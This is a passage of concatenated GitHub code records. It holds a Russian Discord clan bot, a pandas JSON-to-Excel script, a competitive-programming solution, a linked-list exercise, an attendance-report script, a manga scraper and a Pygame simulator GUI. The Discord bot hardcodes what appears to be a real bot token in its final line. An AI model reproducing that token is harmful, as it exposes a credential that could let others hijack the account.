'uptime'\r\n ]\r\n #run commands\r\n data = runCommands(commands)\r\n #display statistics for execution\r\n displayReport(data)\r\n","repo_name":"MorenoAlexander/InternAssignmentMonumentLabs","sub_path":"task1/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29100211653","text":"import asyncio\r\nimport websockets\r\nimport aiohttp\r\nimport logging\r\nimport discord\r\n\r\nlogging.basicConfig(level=logging.INFO)\r\n\r\nclient = discord.Client()\r\nglobal mojnoli\r\nmojnoli = 1\r\n\r\n@client.event\r\nasync def on_ready():\r\n print('Logged in as')\r\n print(client.user.name)\r\n print(client.user.id)\r\n print('----------------------')\r\n print(client)\r\n client.accept_invite('https://discord.gg/byfXzHt')\r\n await client.change_status(game=discord.Game(name='Макро'))\r\n\r\n@client.event\r\nasync def on_message(message):\r\n s1 = message.content\r\n s2 = s1.split()\r\n global announce\r\n global stk\r\n\r\n global an #= open('anonc.txt', '+')\r\n\r\n def botinvoke(msg):\r\n if 'бот' in msg or 'Бот' in msg or 'бот,' in msg or 'Бот,' in msg:\r\n return True\r\n else:\r\n return False\r\n\r\n def bgrets(m2): \r\n if 'Привет' in m2 or 'привет' in m2 or 'Ку' in m2 or 'ку' in m2 or 'Привет,' in m2 or 'Ку,' in m2 or 'ку,' in m2 or 'Хай' in m2 or 'хай' in m2 or 'хай,' in m2 or 'Хай,' in m2 or 'привет!' in m2 or 'привет,' in m2: \r\n return True\r\n \r\n def cats(m2):\r\n if 'кот' in m2 or 'Кот' in m2 or 'Кота' in m2 or 'кота' in m2 or 'Котика' in m2 or 'котика' in m2 or 'котика?' in m2 or 'кота?' in m2:\r\n return True\r\n\r\n def isboss():\r\n man = message.author.name\r\n if man == 'Naxis' or man == 'Nicred' or man == 'VaultBoy' or man == 'YamatoSC':\r\n return True\r\n else:\r\n return False\r\n \r\n\r\n def info(m2):\r\n if 'Список' in m2 or 'список' in m2 or 'таблица' in m2 or 'Таблица' in m2 or 'Игроки' in m2 or 'игроки' in m2:\r\n return True\r\n \r\n if botinvoke(s2)== True:\r\n if bgrets(s2) == True:\r\n if 'никред' in s2 or 'Никред' in s2 or 'никрид' in s2 or 'Никрид' in s2:\r\n return\r\n respto = message.author.mention\r\n neim = message.author.name\r\n if neim == 'FFA':\r\n await client.send_file(message.channel, 'peka.jpg', content=('%s бесишь' % respto))\r\n elif neim == 'VaultBoy':\r\n await client.send_message(message.channel, 'Приветствую, владыка всея хасу, успешный предприниматель, ораганизатор и просто хороший человек %s' % respto)\r\n elif neim == 'WayTeh':\r\n await client.send_message(message.channel, 'Евгений Ваганович, здрасте. Опять шутить будете?')\r\n elif neim == 'Coose':\r\n await client.send_file(message.channel, 'peka.jpg', content=('О, привет, %s. Как ты так быстро вырос из бронзы в алмаз? Ты же в школе должен быть!' % respto))\r\n elif neim == 'Naxis':\r\n await client.send_message(message.channel, '%s, ток не чизь(9' % respto)\r\n elif neim == '#hater':\r\n await client.send_file(message.channel, 'peka.jpg', content=('Привет, %s. Го голос?' % respto))\r\n elif neim == 'YamatoSC':\r\n await client.send_file(message.channel, 'peka.jpg', content=('Привет, %s. Когда ты уже вступишь в хасу ?' % respto))\r\n elif neim == 'SlyFox':\r\n await client.send_message(message.channel, 'Привет, %s. Ты уже научился строить ццшки ?:D' % respto)\r\n elif neim == 'Phoenix':\r\n await client.send_message(message.channel, 'Привет, %s. Взял ачивку за командники?' % respto)\r\n elif neim == 'AdmiralMer':\r\n await client.send_message(message.channel, 'Привет, %s. Всё ещё катаешь в мех ?' % respto)\r\n await client.send_file(message.channel, 'peka.jpg')\r\n elif neim == 'BolvaX':\r\n await client.send_message(message.channel, 'О, %s ты жив О_О' % respto)\r\n elif neim == 'azunyashka':\r\n await client.send_message(message.channel, 'Два чая господину %s из клана Houkago Tea Team' % respto)\r\n elif neim == 'Near':\r\n await client.send_message(message.channel, 'Привет, словоопасный %s' % respto)\r\n elif neim == 'Nicred':\r\n await client.send_file(message.channel, 'peka.jpg', content=('О, привет, %s. Как в школе дела ?' % respto))\r\n elif neim == 'Kronaz':\r\n await client.send_message(message.channel, 'O, %s,привет! Они тут без тебя совсем низуя не могут' % respto)\r\n else: \r\n await client.send_message(message.channel, 'Привет, %s' % respto) \r\n\r\n if message.content == ('таблица') or message.content ==('Таблица'):\r\n await client.send_message(message.channel, r'Таблица игроков - https://docs.google.com/spreadsheets/d/10-ZIiyvbOcJDxj3Pf9RtlBEx9aTQ7skwiUvDyTiP6-A/edit#gid=2008021498')\r\n\r\n if message.content == ('ссылки') or message.content == ('Cсылки'):\r\n await client.send_message(message.channel, r'Канал клана \"Hasu\" на YouTube - https://www.youtube.com/channel/UCmYQiYElhdzp1r-FHK83sKg')\r\n await client.send_message(message.channel, r'Канал WayTeh на YouTube https://www.youtube.com/channel/UC-xiI_-izDZL6p15fxHTSQg')\r\n await client.send_message(message.channel, r'Стримы VaultBoy - http://goodgame.ru/channel/Vault2501/ и https://www.twitch.tv/v4u1tboy ')\r\n await client.send_message(message.channel, r'Стримы SlyFox - http://goodgame.ru/channel/SlyFoxPul/ и https://www.twitch.tv/slyfoxpul')\r\n await client.send_message(message.channel, r'Стримы MasterPendal - http://goodgame.ru/channel/Pendal/')\r\n await client.send_message(message.channel, r'Стримы PesheVik - http://goodgame.ru/channel/PesheVik/ Канал YouTube - https://www.youtube.com/channel/UC5TOurQxipkJLt2a9WzyGGA')\r\n if message.content.startswith('whb'):\r\n print(isboss())\r\n if message.content.startswith('setka is'):\r\n if isboss() == True: \r\n stk = open(\"setka.txt\", 'w')\r\n stk.write(message.content[9:])\r\n stk.close()\r\n await client.send_message(message.channel, 'Ок, босс!') \r\n print(message.content[9:])\r\n else:\r\n print(message.author.name)\r\n await client.send_message(message.channel, 'Ты не босс!')\r\n if message.content.startswith('Анонс ='):\r\n if isboss() == True: \r\n anc = open(\"announce.txt\", 'w')\r\n anc.write(message.content[8:])\r\n anc.close()\r\n await client.send_message(message.channel, 'Ок, босс!') \r\n print(message.content[9:])\r\n else:\r\n print(message.author.name)\r\n await client.send_message(message.channel, 'Недостаточно минералов')\r\n \r\n if message.content.startswith('+pigc'):\r\n \r\n if isboss() == True: \r\n await client.send_message('general', message.content[6:]) \r\n print(message.content[9:])\r\n if message.content == ('dm'):\r\n deleted = client.purge_from(message.channel, limit=10)\r\n await client.send_message(message.channel, 'Deleted {} message(s)'.format(len(deleted)))\r\n print(deleted)\r\n #client.delete_messages(td)\r\n #if message.content == ('!dm %i' %hmtd)\r\n #delete_messages(messages)\r\n#=================================GET ABOVE=======================================\r\n \r\n#=================================================================================\r\n \r\n#===============================POST UNDER========================================\r\n if message.content == ('Анонс') or message.content == ('анонс'):\r\n anc = open('announce.txt', 'r')\r\n msssk2 = anc.read()\r\n await client.send_message(message.channel, msssk2) \r\n\r\n if message.content == ('сетка') or message.content == ('Сетка'): \r\n stk = open('setka.txt', 'r')\r\n msssk = stk.read()\r\n await client.send_message(message.channel, msssk)\r\n \r\n if message.content == ('Бот') or message.content == ('бот'): \r\n hlp = open('hlp.txt', 'r')\r\n msdg = hlp.read()\r\n await client.send_message(message.channel, msdg)\r\n \r\n if message.content == ('клан') or message.content == ('Клан'):\r\n await client.send_message(message.channel, r'Рейтинги игроков клана - http://www.rankedftw.com/clan/H%D0%B0su/played/')\r\n\r\n if ('(peka)') in message.content:\r\n await client.send_file(message.channel, 'peka.jpg')\r\n \r\n if message.content == ('тст'):\r\n print(message.author.name)\r\n if message.author.name == ('Nicred'):\r\n print('yes')\r\n if message.author == client.user:\r\n return\r\n#TODO: DELETING\r\n#\r\n\r\nclient.run('MjEwMDk4NTg5MDgxMjcyMzIw.CoJ1dw.xTAauN-GRTdvq_ccopLtxG3WGbI')\r\n\r\n\r\n \r\n","repo_name":"Nicred/Bothasu","sub_path":"pybotbotdis.py","file_name":"pybotbotdis.py","file_ext":"py","file_size_in_byte":9856,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"30871017135","text":"import pandas as pd\nimport json\nimport os\n \n# Specify the JSON file name\njson_file_name = \"/var/lib/jenkins/workspace/test/insecure-bank-Reference.json\"\n \n# Extract the base name of the JSON file (without extension)\nbase_name = os.path.splitext(os.path.basename(json_file_name))[0]\n \n# Load JSON data from file\nwith open(json_file_name, 'r') as json_file:\n data = json.load(json_file)\n \n# Convert JSON to DataFrame\ndf = pd.json_normalize(data)\n \n# Save DataFrame to Excel with the same base name as JSON file\nexcel_file_name = f'{base_name}.xlsx'\ndf.to_excel(excel_file_name, index=False)\n \nprint(f\"Conversion completed. Excel file saved as: {excel_file_name}\")\n","repo_name":"sakirm-icpl/convert","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"41706826712","text":"from collections import Counter\r\n\r\n# print('input >>')\r\n\r\nS = input()\r\nS = S[::-1] + '0'\r\n\r\nmod = 0\r\nmods = [0] * 2019\r\nmods[0] += 1\r\n\r\ni_mod = 1\r\n\r\nfor i in range(len(S)-1):\r\n # mods[i+1] = (int(S[i+1]) * 10 ** (i+1) + mods[i]) % 2019\r\n i_mod %= 2019\r\n mod = (int(S[i]) * i_mod + mod) % 2019\r\n # print(mod)\r\n mods[mod]+=1\r\n i_mod *= 10\r\n\r\n# print(mods)\r\n\r\nans = 0\r\n\r\n# counter = Counter(mods)\r\n\r\n# for n in counter.values():\r\n# if n > 1:\r\n# ans += (n * (n-1)) // 2\r\n\r\n# print('-----output-----')\r\n\r\nfor m in mods:\r\n if m > 1:\r\n ans += (m * (m-1)) // 2\r\n\r\nprint(ans)","repo_name":"kussy-tessy/atcoder","sub_path":"old/ABC164/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5995981882","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\n# --------------------------------------\nimport pandas as pd\nimport glob\nimport sys\nimport os\nimport os.path\nfrom os import walk\nfrom os.path import isfile, join\nimport hashlib\n# --------------------------------------\n\nif (len(sys.argv) < 2):\n\tprint(\"No argument was given or too few.\\nUse: attendance.py [directory=]\")\n\tsys.exit(1)\n\ndirectory = sys.argv[1] #Takes all files in path and runs on them\nf = []\nfp = []\n\ncwd = os.getcwd() #gets current directory\ncdcwd = cwd+\"/\"+directory #go to user input directrory\nsearch = directory+\"/participant-*\"\nhash_md5 = hashlib.md5()\n\ndef getListDirFiles(searchFile):\n\tfor item in glob.glob(searchFile):\n\t\tf.append(os.path.basename(item))\n\t\tfp.append(item)\t\n\treturn f, fp\n\t\ndef createDir(dirname):\n\tdirct = os.path.join(cdcwd, dirname)\n\tif not os.path.exists(dirct):\n\t\tos.mkdir(dirct)\n\treturn dirct, dirname\n\nunique_files = dict()\ndef remDups(fileList):\n\tfor item in fileList:\n\t\th_file = hashlib.md5(open(item, 'rb').read()).hexdigest()\n\t\tif h_file not in unique_files:\n\t\t\tunique_files[h_file] = item\n\t\telse:\n\t\t\tos.remove(item)\n\t\t\t\nfilesList, filepList = getListDirFiles(search)\nremDups(filepList) #removes duplicates\npth, newdir = createDir(\"Attendance\") #pth is path to csv_files/Attendance\n\ndef getKey():\n df_key = pd.DataFrame()\n df_sample = pd.read_csv(cdcwd+\"/\"+filesList[0], encoding=\"UTF-16LE\", sep=\"\\t\")\n df_sample = df_sample.drop_duplicates(subset=['Attendee Email'])\n \n df_sample = df_sample.set_index('Attendee Email')\n df_key['Attendee Email'] = df_sample.index\n df_key = df_key.set_index('Attendee Email')\n \n df_key['Name'] = df_sample['Name']\n \n return df_key\n\ndf_key = getKey() #starts a new table which will also stores our key email values from the sample\ndf_key = df_key.sort_values(by=['Name'])\n\ndef pullRelData(df):\n\tdf[['Attendance Time','M']] = df['Attendance Duration'].str.split(' ', expand=True) #splits duration to int time and char min\n\n\tdf[['Date','Start Hour']] = df['Meeting Start Time'].str.split(' ',expand=True)\n\tdf[['End Date',\"End Hour\"]] = df['Meeting End Time'].str.split(' ',expand=True)\n\n\tdf[['sHour', 'sMinute', 'sSecond']] = df['Start Hour'].str.split(':',expand=True)\n\tdf[['eHour', 'eMinute', 'eSecond']] = df['End Hour'].str.split(':',expand=True)\n\tdf = df.drop(columns=[\"Meeting Start Time\",\"Meeting End Time\"])\n\n\tdf[\"sHour\"] = df[\"sHour\"].str.extract('(\\d+)', expand=False).astype(int)\n\tdf[\"sMinute\"] = df[\"sMinute\"].str.extract('(\\d+)', expand=False).astype(int)\n\tdf[\"eHour\"] = df[\"eHour\"].str.extract('(\\d+)', expand=False).astype(int)\n\tdf[\"eMinute\"] = df[\"eMinute\"].str.extract('(\\d+)', expand=False).astype(int)\n\n\tdf[\"Hour_diff\"] = df[\"eHour\"]-df[\"sHour\"]\n\tdf[\"Min_diff\"] = df[\"eMinute\"]-df[\"sMinute\"]\n\tdf[\"Session Duration\"] = df[\"Hour_diff\"]*60+df[\"Min_diff\"]\n\n\t#Email is key. Combines emails and sums them by time.\n\tdropList = df.columns[:]\n\tdropList = dropList.drop(['Name', 'Attendee Email', 'Attendance Time', 'Session Duration', 'Date'])\n\t\n\tdf = df.drop(columns=dropList)\n\tdf[\"Date\"] = df[\"Date\"].str.extract('(\\d+-\\d+-\\d+)', expand=False)\n\n\tdf[\"Attendance Time\"] = df[\"Attendance Time\"].astype(int)\n\tdf_grouped = df[['Attendee Email', 'Attendance Time']]\n\tdf_grouped = df_grouped.groupby('Attendee Email').sum() #groups by email and sums their attendance time\n\tdf = df.drop_duplicates(subset=['Attendee Email'])\n\tdf = df.set_index('Attendee Email')\n\n\tdf = df.sort_values(by=['Name'])\n\tdf[\"Attendance Time\"] = df_grouped[\"Attendance Time\"]\n\t\n\treturn df\n\nfor each in unique_files:\n\tdf = pd.read_csv(cwd+\"/\"+unique_files[each], encoding=\"UTF-16LE\", sep=\"\\t\")\t\n\tdf = pullRelData(df)\n\t##Attach new data to key data\n\tdateName = df[\"Date\"][0]\n\tdf_key[dateName] = df[\"Attendance Time\"]\n\nsumAllTimes = df_key.iloc[:,1:].sum(axis=1)\nmaxTimes = 4*60*(len(df_key.columns)-2)\ndf_key[\"Total Percentage\"] = sumAllTimes/maxTimes\n\n\ndf_key.to_csv(pth+\"/Attendance.csv\")\n\n","repo_name":"LiorTime/Bynet-Homework","sub_path":"Ex3/attendance.py","file_name":"attendance.py","file_ext":"py","file_size_in_byte":3926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"20648309824","text":"import requests\nimport pandas as pd\nfrom bs4 import BeautifulSoup\n\n\ndef Scrap_titles(PATH_TO_TCBSCANS, LOG):\n \"\"\"Scrap mangas titles from tcbscans.\n\n Args:\n PATH_TO_TCBSCANS (str): path to tcbscans directory (update)\n LOG (Any): the logger\n\n Returns:\n str: 'success' if passed, 'failed' if an error occured\n \"\"\"\n\n links_list = []\n manga_name_list = []\n\n url = \"https://tcbscans.com/projects\"\n\n try:\n response = requests.get(url)\n html_content = response.text\n soup = BeautifulSoup(html_content, \"html.parser\")\n select_element = soup.select_one('body > main > div.overflow-hidden > div > div.grid.grid-cols-1.md\\:grid-cols-2.gap-3')\n\n if select_element:\n mangas = select_element.find_all(\"div\", class_=\"relative h-24 w-24 sm:mb-0 mb-3\")\n if mangas == []:\n LOG.debug(f\"No manga added | {url}\")\n return \"failed\"\n for manga in mangas:\n link = 'https://tcbscans.com' + manga.find(\"a\").get(\"href\")\n manga_name = link.split(\"/\")[-1]\n links_list.append(link)\n manga_name_list.append(manga_name)\n LOG.debug(f\"{manga_name} added | {link}\")\n else:\n LOG.debug(f\"No element found | {url}\")\n return \"failed\"\n\n except Exception as e:\n LOG.debug(f\"Error | {e}\")\n return \"failed\"\n\n if manga_name_list == []:\n return \"failed\"\n\n LOG.info(f\"{len(manga_name_list)} mangas fetched.\")\n\n data_to_add = [{\"NomManga\": name, \"links\": links} for name, links in zip(manga_name_list, links_list)]\n datas = pd.DataFrame(data_to_add)\n datas.to_csv(f'{PATH_TO_TCBSCANS}/datas/mangas.csv', index=False)\n return \"success\"\n","repo_name":"CAprogs/PandaScan","sub_path":"src/update/websites/tcbscans/scrap_titles.py","file_name":"scrap_titles.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"20089074810","text":"class Node(object) :\n\tdef __init__(self, data) :\n\t\tself.data = data\n\t\tself.next = None\n\ndef printLL(head) :\n\twhile head is not None :\n\t\tprint(head.data)\n\t\thead = head.next\n\ndef printLastKth(head, K) :\n\tcurr1 = head\n\tcurr2 = head\n\n\tk = 0\n\twhile curr1 is not None :\n\t\tk+=1\n\t\tcurr1 = curr1.next\n\t\tif k > K :\n\t\t\tcurr2 = curr2.next\n\n\tprint(curr2.data)\n\n\nhead = Node(1)\n\ncurrent = head\nfor i in range(2, 100) :\n\tcurrent.next = Node(i)\n\tcurrent = current.next\n\nprintLastKth(head, 99)\n\n\n\n\n\n\n","repo_name":"raviy1290/py2-3","sub_path":"ds/ds-prob/linkedList/delKthLastElem.py","file_name":"delKthLastElem.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"16243456189","text":"import os\nimport pygame\nimport datetime\nimport collections\nimport math\nfrom world import Plant, Bot, Signal\n\n\nclass BasePanel:\n def __init__(self, width, height, text_scale, text_color, bg_color):\n self.text_color = text_color\n self.text_scale = text_scale\n self.surface = pygame.Surface((width, height))\n # self.font = pygame.font.SysFont('calibri,dejavu sans,courier-new', 10)\n self.width, self.height = width, height\n self.writer = TextWriter('resources' + os.sep + 'nss_font_5x8.png', 5, 8, 1, 16)\n self.bg_color = bg_color\n\n def resize_surface(self, new_size):\n self.surface = pygame.Surface(new_size)\n self.width, self.height = new_size\n\n def get_size(self):\n return self.width, self.height\n\n\nclass ViewPort(BasePanel):\n def __init__(self, world, width, height, text_scale=1, text_color=(220, 220, 220), bg_color=(0, 0, 0)):\n super(ViewPort, self).__init__(width, height, text_scale, text_color, bg_color)\n self.world = world\n self.surface = pygame.Surface((width, height))\n self.camera_x = 0\n self.camera_y = 0\n self.zoom = 1\n self.draw_signals = True\n\n def zoom_in(self):\n self.zoom *= 2\n\n def zoom_out(self):\n if self.zoom >= 2:\n self.zoom //= 2\n\n def point_is_visible(self, point):\n visible_x = self.camera_x <= point[0] < (self.width / self.zoom) + self.camera_x\n visible_y = self.camera_y <= point[1] < (self.height / self.zoom) + self.camera_y\n return visible_x and visible_y\n\n def render(self):\n self.surface.fill(self.bg_color)\n self.surface.lock()\n pixels = pygame.surfarray.pixels3d(self.surface)\n # Draw a vague outline around the world if bounded\n if self.world.boundary_sizes:\n left, top = self.world_point_to_surface((0, 0))\n width, height = self.world.boundary_sizes[0] * self.zoom, self.world.boundary_sizes[1] * self.zoom\n pygame.draw.rect(self.surface, (15, 15, 15), (left, top, width+1, height+1), int(self.zoom**0.5))\n # TODO: Use HSV color space instead of RBG to simplify all of this\n if self.draw_signals:\n for signal in self.world.signals:\n if self.point_is_visible((signal.x, signal.y)):\n diameter = signal.diameter\n left = ((signal.x - (diameter/2)) - self.camera_x) * self.zoom\n top = ((signal.y - (diameter/2)) - self.camera_y) * self.zoom\n signal_color = signal.color if signal.color else (75, 75, 75)\n if signal.age > 2:\n age_ratio = min((signal.age-2)/signal.max_age, 1)\n signal_color = (math.floor(signal_color[0] - (signal_color[0] * age_ratio)),\n math.floor(signal_color[1] - (signal_color[1] * age_ratio)),\n math.floor(signal_color[2] - (signal_color[2] * age_ratio)))\n pygame.draw.ellipse(self.surface, signal_color,\n (left, top, diameter*self.zoom, diameter*self.zoom), 1)\n for plant in self.world.plants:\n if self.point_is_visible((plant.x, plant.y)):\n energy_ratio = plant.energy/plant.max_energy\n plant_energy_color = (int(40 * energy_ratio), int(240 * energy_ratio), int(40 * energy_ratio))\n age_ratio = plant.age/plant.max_age\n plant_age_color = (40 - int(20*age_ratio), 240 - int(200*age_ratio), 40 - int(20*age_ratio))\n self._draw_plant_or_bot(pixels, plant, plant_energy_color, plant_age_color, True)\n for bot in self.world.bots:\n if self.point_is_visible((bot.x, bot.y)):\n age_ratio = bot.age/bot.max_age\n if bot.age <= 10:\n bot_age_color = (30, 40, 250)\n else:\n bot_age_color = (220 - int(150*age_ratio), 60 - int(40*age_ratio), 220 - int(150*age_ratio))\n energy_ratio = 1000 - bot.energy\n bot_energy_color = (220, 60, 220) if bot.energy > 1000 \\\n else (220-int(energy_ratio*(200/1000)), 60-int(energy_ratio*(50/1000)), 220-int(energy_ratio*(200/1000)))\n self._draw_plant_or_bot(pixels, bot, bot_energy_color, bot_age_color, True)\n # Draw a selection outline if a bot is selected\n if self.world.selected_bot:\n self._draw_plant_or_bot(pixels, self.world.selected_bot, (255, 255, 255), (255, 255, 255), False)\n del pixels\n self.surface.unlock()\n\n def _draw_plant_or_bot(self, pixel_array, entity, entity_color, energy_color, selected_color):\n t = 0 if selected_color else 1\n diameter = self.zoom\n if not selected_color:\n diameter += 2\n if diameter == 3:\n diameter += 1\n x, y = self.world_point_to_surface((entity.x, entity.y))\n if self.zoom == 1:\n pixel_array[x][y] = entity_color\n if not selected_color:\n for border_x, border_y in ((-1, -1), (-1, 1), (1, -1), (1, 1)):\n px = x + border_x\n py = y + border_y\n pixel_array[px][py] = (255, 255, 255)\n elif self.zoom <= 2:\n pygame.draw.rect(self.surface, entity_color, (x - diameter//2, y - diameter//2, diameter, diameter), t)\n elif 3 <= self.zoom < 8:\n pygame.draw.ellipse(self.surface, entity_color, (x - diameter//2, y - diameter//2, diameter, diameter), t)\n else:\n pygame.draw.ellipse(self.surface, entity_color, (x - diameter//2, y - diameter//2, diameter, diameter), t)\n pygame.draw.ellipse(self.surface, energy_color,\n (x - diameter//4, y - diameter//4, diameter//2, diameter//2), 0)\n\n def track_selected_bot(self):\n if self.world.selected_bot:\n bot = self.world.selected_bot\n self.center_camera_on_point((bot.x, bot.y))\n\n def move_camera_to_coordinates(self, x, y):\n self.camera_x, self.camera_y = x, y\n\n def move_camera_by_vector(self, dx, dy):\n self.camera_x += dx\n self.camera_y += dy\n\n def get_center_offset(self):\n dx = (self.width / (self.zoom + 1)) - self.camera_x\n dy = (self.height / (self.zoom + 1)) - self.camera_y\n return dx, dy\n\n def center_camera_on_point(self, point):\n box_width, box_height = self.width/self.zoom, self.height/self.zoom\n half_width, half_height = box_width/2, box_height/2\n x = point[0] - half_width\n y = point[1] - half_height\n self.move_camera_to_coordinates(x, y)\n\n def surface_point_to_world(self, point):\n return (point[0] / self.zoom) + self.camera_x, (point[1] / self.zoom) + self.camera_y\n\n def world_point_to_surface(self, point):\n return (point[0]-self.camera_x) * self.zoom, (point[1]-self.camera_y) * self.zoom\n\n\nclass InfoPanel(BasePanel):\n def __init__(self, world, clock, width, height, text_scale, text_color, bg_color):\n super(InfoPanel, self).__init__(width, height, text_scale, text_color, bg_color)\n self.world = world\n self.clock = clock\n self.labels_map = self._position_labels()\n self._position_labels()\n\n def _position_labels(self):\n x = 5\n y = 22 * self.text_scale\n labels = [\"Tick\", \"Time\", \"FPS\", \"Free Energy\", \"Plants\", \"Bots\", \"Signals\", \"Plants Born\", \"Bots Born\",\n \"Signals Used\"]\n positions = []\n for index, label in enumerate(labels):\n positions.append((label, (x, (index+1)*y)))\n positions.insert(0, (\"Metrics\", (x, x)))\n return positions\n\n def render(self):\n # TODO: Make this cleaner\n data = self._poll_data()\n self.surface.fill(self.bg_color)\n for index, pair in enumerate(self.labels_map):\n label, pos = pair\n label_surface = self.writer.get_text_surface(label, self.text_color)\n if self.text_scale > 1:\n new_width = label_surface.get_width() * self.text_scale\n new_height = label_surface.get_height() * self.text_scale\n label_surface = pygame.transform.scale(label_surface, (new_width, new_height))\n # label_surface = self.font.render(label, 0, color)\n self.surface.blit(label_surface, pos)\n if index > 0:\n amount_surface = self.writer.get_text_surface(str(data[index-1]), self.text_color)\n if self.text_scale > 1:\n new_width = amount_surface.get_width() * self.text_scale\n new_height = amount_surface.get_height() * self.text_scale\n amount_surface = pygame.transform.scale(amount_surface, (new_width, new_height))\n # amount_surface = self.font.render(str(data[index-1]), 0, color)\n self.surface.blit(amount_surface, (11, pos[1]+(11*self.text_scale)))\n\n def _poll_data(self):\n data = []\n data.append(self.world.tick_number)\n seconds = int(self.world.time)\n data.append(str(datetime.timedelta(seconds=seconds)))\n data.append(round(self.clock.get_fps(), 2))\n if self.world.energy_pool is not None:\n data.append(self.world.energy_pool)\n else:\n data.append(\"Unlimited\")\n data.append(len(self.world.plants))\n data.append(len(self.world.bots))\n data.append(len(self.world.signals))\n data.append(Plant.counter)\n data.append(Bot.counter)\n data.append(Signal.counter)\n return data\n\n\nclass BotPanel(BasePanel):\n def __init__(self, world, width, height, text_scale, text_color, bg_color):\n super(BotPanel, self).__init__(width, height, text_scale, text_color, bg_color)\n self.world = world\n self.labels_map = self._position_labels()\n\n def _position_labels(self):\n x = 7\n y = 22 * self.text_scale\n labels = [\"Name\", \"Position\", \"Energy\", \"Peak Energy\", \"Generation\", \"Birthday\", \"Age\", \"Children\",\n \"Child Invest\", \"Brain Size\"]\n positions = []\n for index, label in enumerate(labels):\n positions.append((label, (x, (index+1)*y)))\n positions.insert(0, (\"Selected Bot\", (x, x)))\n return positions\n\n def render(self):\n # TODO: Make this cleaner\n data = self._poll_data()\n if data is None:\n data = ['-' for _ in range(len(self.labels_map))]\n self.surface.fill(self.bg_color)\n for index, pair in enumerate(self.labels_map):\n label, pos = pair\n label_surface = self.writer.get_text_surface(label, self.text_color)\n if self.text_scale > 1:\n new_width = label_surface.get_width() * self.text_scale\n new_height = label_surface.get_height() * self.text_scale\n label_surface = pygame.transform.scale(label_surface, (new_width, new_height))\n # label_surface = self.font.render(label, 0, color)\n self.surface.blit(label_surface, pos)\n if index > 0:\n amount_surface = self.writer.get_text_surface(str(data[index-1]), self.text_color)\n if self.text_scale > 1:\n new_width = amount_surface.get_width() * self.text_scale\n new_height = amount_surface.get_height() * self.text_scale\n amount_surface = pygame.transform.scale(amount_surface, (new_width, new_height))\n # amount_surface = self.font.render(str(data[index-1]), 0, color)\n self.surface.blit(amount_surface, (11, pos[1]+(11 * self.text_scale)))\n\n def _poll_data(self):\n if self.world.selected_bot:\n bot = self.world.selected_bot\n data = [bot.name, str((int(bot.x), int(bot.y))), bot.energy, bot.peak_energy,\n bot.generation_number, bot.birthday,\n '%d (%d%%)' % (bot.age, int(bot.age/bot.max_age*100)),\n bot.number_children, bot.child_investment, len(bot.behavior.behavior_nodes)]\n return data\n else:\n return None\n\n\nclass GraphPanel(BasePanel):\n # TODO: Reduce lag probably caused by this class\n def __init__(self, world_watcher, width, height, text_scale, text_color, bg_color):\n super(GraphPanel, self).__init__(width, height, text_scale, text_color, bg_color)\n self.world_watcher = world_watcher\n self.granularity = 1\n self.plants = collections.deque(maxlen=self.width)\n self.bots = collections.deque(maxlen=self.width)\n self.signals = collections.deque(maxlen=self.width)\n self.max_value = 1\n\n def _plot_line(self, array, color, thickness):\n x = 0\n for value in array:\n y = (self.height + 3) - (((value+1)/(self.max_value+1)) * self.height)\n # Make sure the maximum value is drawn on the graph\n if y <= 6:\n y = 6\n pygame.draw.rect(self.surface, color, (x-1, int(y)-4, 2, 2), 1)\n x += 1\n\n def render(self):\n self.surface.fill(self.bg_color)\n for array, color in ((self.plants, (40, 220, 40)),\n (self.bots, (220, 40, 220)), (self.signals, (40, 40, 220))):\n self._plot_line(array, color, 2)\n\n def poll_data(self):\n if self.plants and self.bots and self.signals:\n self.max_value = max(max(self.plants), max(self.bots), max(self.signals))\n else:\n self.max_value = 1\n self.plants.append(self.world_watcher.plant_numbers[-1])\n self.bots.append(self.world_watcher.bot_numbers[-1])\n self.signals.append(self.world_watcher.signal_numbers[-1])\n\n def resize_surface(self, new_size):\n super().resize_surface(new_size)\n # Reset the size of each deque and repopulate it with data\n world_plants = self.world_watcher.plant_numbers\n world_bots = self.world_watcher.bot_numbers\n world_signals = self.world_watcher.signal_numbers\n self.plants = collections.deque(world_plants, self.width)\n self.bots = collections.deque(world_bots, self.width)\n self.signals = collections.deque(world_signals, self.width)\n\n\nclass TextWriter:\n def __init__(self, filename, char_width, char_height, border_gap, chars_per_row):\n self.font_surface = pygame.image.load(os.getcwd() + os.sep + filename)\n self.char_height = char_height\n self.char_width = char_width\n self.char_border = border_gap\n self.chars_per_row = chars_per_row\n self.char_map = {}\n for i in range(32, 128):\n char_index = i-32\n row = char_index // self.chars_per_row\n col = char_index % self.chars_per_row\n x_coord = (self.char_border * (col + 1)) + (col * self.char_width)\n y_coord = (self.char_border * (row + 1)) + (row * self.char_height)\n self.char_map[chr(i)] = (x_coord, y_coord, self.char_width, self.char_height)\n\n def get_text_surface(self, text, text_color):\n chars_surface = pygame.Surface(((len(text) * self.char_width) + len(text), self.char_height),\n depth=self.font_surface)\n for i, char in enumerate(text):\n if char in self.char_map:\n rect = self.char_map[char]\n else:\n rect = self.char_map[chr(127)]\n chars_surface.blit(self.font_surface, ((i * self.char_width) + i, 0,\n self.char_width, self.char_height), rect)\n pixel_array = pygame.PixelArray(chars_surface)\n pixel_array.replace((0, 0, 0), text_color)\n return chars_surface\n","repo_name":"sjirjies/nss","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":15874,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} 